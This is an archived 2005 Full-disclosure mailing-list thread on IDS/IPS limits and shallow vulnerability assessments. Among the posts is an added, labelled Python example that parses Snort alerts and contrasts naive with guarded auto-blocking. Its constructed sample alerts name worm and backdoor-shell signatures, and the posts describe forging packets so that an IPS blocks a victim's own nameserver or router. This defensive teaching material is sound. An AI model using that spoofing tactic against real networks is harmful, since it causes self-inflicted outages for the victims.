/* REDUNDANT COMMENT */ "You are the weakest link..." People fail
miserably. Products can only do what they're told, but no matter how many
acronymed buzzwords you want to throw around ("Super Hip Intelligent
Threading"), it's still SHIT unless you have the ability to use your own
common sense, experience, knowledge, etc.


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
GPG Key ID 0x97B43D89
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x97B43D89

"Just one more time for the sake of sanity tell me why
 explain the gravity that drove you to this..." Assemblage


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Valdis . Kletnieks
On Wed, 28 Sep 2005 11:48:06 +0200, Peer Janssen said:

> Really? Is there no software package capable of withholding inspected 
> packages until cleared by said IDS?

All depends on the inbound packet rate, how fast the IDS is, and how much RAM
you're willing to buy.  Just remember that a sufficiently long queue is in
itself a denial of service... ;)

> Dropping packets, closing ports and resetting connections (besides 
> logging, maybe notifying users) look like natural useful reactions to 
> the detections delivered by an IDS to me.

Just remember to configure the thing sensibly - it's amazing how many
people manage to shoot themselves in the foot, and find out the hard way
that yes, Virginia, there ARE people out there that will forge packets
with the source IP address of the victim's nameserver... ;)

> Or are we just talking about definitions (regarding the "D" in IDS), 
> instead of talking about IDPS-ses which the OP clearly seems to imply? 
> (P for prevention)

It's *very* important to talk about definitions - there's waaay too many
people who buy an IDS and think that by hooking it to the net, it magically
becomes an IPS.

An equally great number buy some IPS or other, and find out the hard way that
they don't block a 0-day or a new worm.

> So what are the IDPS-ses you recommend?

I recommend buying one that you're able to get your brain wrapped around what
the unit *can* and *cannot* do for you.  A less functional unit that you
understand fully is a better choice than a top-of-the-line whizz-bang-3000 that
you have no clue about its actual abilities.  Quite frankly, anybody who
already has a PIX installed and wants to install an IPS needs to quantify
*exactly* what protection the PIX is failing to provide before they go shopping
for anything.



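The self-inflicted outage that both Michael Holstein (spoof a packet that looks like an attack from your upstream router or smtp server) and Valdis Kletnieks (forged packets with the source address of the victim's nameserver) warn about, as an added example that is not code from either post, from Snort or from Cisco. It is a small responder over Snort's one-line alert_fast output, the format a "tail the log and push an ACL" script would consume. The naive policy blocks every source the sensor names; the guarded one only acts on rules the operator has verified to fire inside an established TCP session, never touches a protected-infrastructure list, and wants more than one hit. The alert lines, the addresses, the protected list and the verified-SID set are all constructed or assumed for the example.

```python
"""Auto-blocking responder for Snort alert_fast lines, naive vs guarded.

Added example; not code from the posts, from Snort or from Cisco. The alert
lines, addresses, protected-host list and verified-SID set are constructed.
"""
import re
from collections import Counter
from ipaddress import ip_address, ip_network

# One line of Snort's alert_fast output:
#   <ts>  [**] [gid:sid:rev] <msg> [**] [Classification: ..] [Priority: n] {PROTO} src[:port] -> dst[:port]
FAST_ALERT = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\] \[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\] "
    r"(?P<msg>.+?) \[\*\*\] (?:\[Classification: (?P<cls>[^\]]*)\] )?"
    r"\[Priority: (?P<prio>\d+)\] \{(?P<proto>[A-Z]+)\} "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<sport>\d+))? -> "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<dport>\d+))?\s*$"
)

# Constructed sample. The msg strings are modelled on classic Snort rules, but
# no line here is real sensor output. 192.0.2.53 is "our nameserver" and
# 203.0.113.1 "our upstream router": single spoofed datagrams carrying those
# source addresses are exactly what the posts describe.
SAMPLE_ALERTS = """\
09/28-10:01:03.112233  [**] [1:2003:8] MS-SQL Worm propagation attempt [**] [Classification: Misc Attack] [Priority: 2] {UDP} 192.0.2.53:1434 -> 192.0.2.10:1434
09/28-10:01:04.000001  [**] [1:1256:8] WEB-IIS CodeRed v2 root.exe access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 198.51.100.7:40012 -> 192.0.2.10:80
09/28-10:01:05.000002  [**] [1:1256:8] WEB-IIS CodeRed v2 root.exe access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 198.51.100.7:40013 -> 192.0.2.10:80
09/28-10:01:06.000003  [**] [1:469:3] ICMP PING NMAP [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 203.0.113.1 -> 192.0.2.10
09/28-10:01:07.000004  [**] [1:1256:8] WEB-IIS CodeRed v2 root.exe access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 10.0.0.5:51000 -> 192.0.2.10:80
09/28-10:01:08.000005  [**] [1:1256:8] WEB-IIS CodeRed v2 root.exe access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 198.51.100.9:51001 -> 192.0.2.10:80
this is not an alert line and must be ignored
"""

# Hosts that must never be ACLed no matter what the sensor says (assumed
# addresses): upstream router, our nameserver, our SMTP relay, internal nets.
PROTECTED = [
    ip_network("203.0.113.1/32"),
    ip_network("192.0.2.53/32"),
    ip_network("192.0.2.25/32"),
    ip_network("10.0.0.0/8"),
]

# (gid, sid) of rules the operator has checked fire only inside an established
# TCP session (flow:established in the rule body). A single spoofed datagram can
# carry any source address, so alerts from any other rule never drive a block.
# Assumed set for the example.
AUTO_BLOCK_SIDS = {(1, 1256)}


def parse_fast_alert(line):
    """Return the alert's fields as a dict, or None for lines that are not alerts."""
    m = FAST_ALERT.match(line)
    if not m:
        return None
    a = m.groupdict()
    for key in ("gid", "sid", "rev", "prio"):
        a[key] = int(a[key])
    a["src"] = ip_address(a["src"])
    a["dst"] = ip_address(a["dst"])
    return a


def naive_block_list(alert_lines):
    """'Block whatever the IDS names': every source address, including the
    spoofed nameserver and upstream router."""
    alerts = filter(None, map(parse_fast_alert, alert_lines))
    return sorted({str(a["src"]) for a in alerts})


def guarded_block_list(alert_lines, protected=PROTECTED,
                       auto_block_sids=AUTO_BLOCK_SIDS, min_hits=2):
    """Block a source only if it tripped a verified established-session rule,
    is not protected infrastructure, and did so at least min_hits times."""
    hits = Counter()
    for a in filter(None, map(parse_fast_alert, alert_lines)):
        if (a["gid"], a["sid"]) not in auto_block_sids:
            continue
        if any(a["src"] in net for net in protected):
            continue
        hits[a["src"]] += 1
    return sorted(str(src) for src, n in hits.items() if n >= min_hits)


if __name__ == "__main__":
    lines = SAMPLE_ALERTS.splitlines()
    print("naive  :", naive_block_list(lines))
    print("guarded:", guarded_block_list(lines))
```

Run it and the naive list contains the nameserver (192.0.2.53) and the upstream router (203.0.113.1), which is the outage the posts describe; the guarded list contains only 198.51.100.7. The SID allowlist is the guard that matters: a hit threshold alone does nothing against spoofing, since the attacker can send as many forged datagrams as the threshold wants, and the protected list is the backstop for the day a "verified" rule turns out to fire on a bare SYN.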

Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Peer Janssen

[EMAIL PROTECTED] wrote:

> On Wed, 28 Sep 2005 15:54:41 +0700, Fajar Edisya Putera said:
>
>> plan to install IDS to protect our resources
>
> An IDS doesn't *protect* your resources, any more than a concealed
> video surveillance camera protects anything.  It may tell you who did it, and
> what they did, *after the fact*, but it won't *protect* you.

Really? Is there no software package capable of withholding inspected 
packages until cleared by said IDS?


If I get it right, netfilter actually IS able to reject (and log) 
packages. Why should an IDS sniffing on a level higher up on the "OSI 
chain of command" be unable to do the same?


Dropping packets, closing ports and resetting connections (besides 
logging, maybe notifying users) look like natural useful reactions to 
the detections delivered by an IDS to me.


Or are we just talking about definitions (regarding the "D" in IDS), 
instead of talking about IDPS-ses which the OP clearly seems to imply? 
(P for prevention)


So what are the IDPS-ses you recommend?

Peer



Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Valdis . Kletnieks
On Wed, 28 Sep 2005 15:54:41 +0700, Fajar Edisya Putera said:

> Our company plans to install an IDS to protect our resources. I've already
> read about Snort as a NIDS, but that's software-based. I'm interested in a
> hardware-based one that will work transparently with our Cisco PIX, with no
> need to make changes in our firewall. What's your suggestion?

Step 1: Learn that there's no *true* hardware-based solutions here.  What you're
really buying is a box with a CPU, some memory, a network interface or three,
and some software.  Many "hardware" IDS are in fact just Snort-in-a-box, or
optimized-Snort-in-a-box.  Others will be some other "software in a box".

To understand why, consider why you can't get a high-speed line card from Cisco
(which *are* lots of black-magic ASIC hardware) to do any significant filtering
to the level that Snort inspects packets.

Step 2:  An IDS doesn't *protect* your resources, any more than a concealed
video surveillance camera protects anything.  It may tell you who did it, and
what they did, *after the fact*, but it won't *protect* you. (At least a
*visible* video cam might make the malefactor think twice - but who *ever*
has an IDS that's as visible as (say) the video cameras in a bank lobby??) :)



[Full-disclosure] Suggestion for IDS

2005-09-28 Thread Fajar Edisya Putera
Dear Experts,

Our company plans to install an IDS to protect our resources. I've already
read about Snort as a NIDS, but that's software-based. I'm interested in a
hardware-based one that will work transparently with our Cisco PIX, with no
need to make changes in our firewall. What's your suggestion?

Thanks
Fajar

Re: [Full-disclosure] urgent info require

2005-09-28 Thread Valdis . Kletnieks
On Tue, 27 Sep 2005 09:20:57 -, adnan habib said:
> i want  to implement juniper (netscreen) solution in my company ,,, moveover 
> i want to replace cyberguard from juniper ... is there any one let me know 
> any strong point that will support me in replacement like weakness in 
> cyberguard etc,,

First off, a 'Subject: urgent info require' is likely to land you in a lot
of spam filters.  'Subject: Need comparison of netscreen and cyberguard' would
do a lot better.

It sounds like you've already made up your mind to replace the cyberguard
with netscreen - what reason(s) did you already have (so we don't repeat those)?




Re: [Full-disclosure] CORE-Impact license bypass

2005-09-28 Thread Bernhard Mueller
[EMAIL PROTECTED] wrote:
> On Tue, 27 Sep 2005 17:53:58 +0200, Bernhard Mueller said:
> 
> And note also that "finding a hole" and "be talented enough to create an
> exploit" are *totally* distinct.  I found a rather nasty rootable hole in
> Sendmail a while back (read the release notes for 8.10.1 and the relevant
> manpages for the system linker - that gives enough info to figure out what the
> bug was). Never did create a working exploit for it - I fooled with it for an
> afternoon and only got as far as proving that if somebody were to spend more
> than an afternoon on it, they *could* produce a working exploit.
> 

i agree with this. it's often much easier to find a bug than to exploit
it (see strange heap overflows and the like), and i also don't have the
time to spend days on disassembling and looking for attack vectors (and
i'm sure that other people will have more fun doing just that).
what i criticize is that *lots* of companies (at least here in my
vicinity) are selling cheap "vulnerability assessments" which actually
are nothing more than automated security scans. this leads to the
customer feeling safe when he's really wide open to attacks. often,
these people's networks can be rooted in no time.
sure, you don't have to be uber-31337 to do penetration tests (i'm
certainly not), but it should definitely go beyond the
"scan--+--google-for-exploit" approach.

regards,

-- 
_

~  DI (FH) Bernhard Mueller
~  IT Security Consultant

~  SEC-Consult Unternehmensberatung GmbH
~  www.sec-consult.com

~  A-1080 Wien  Blindengasse 3
~  Tel:   +43/676/840301718
~  Fax:   +43/(0)1/4090307-590
__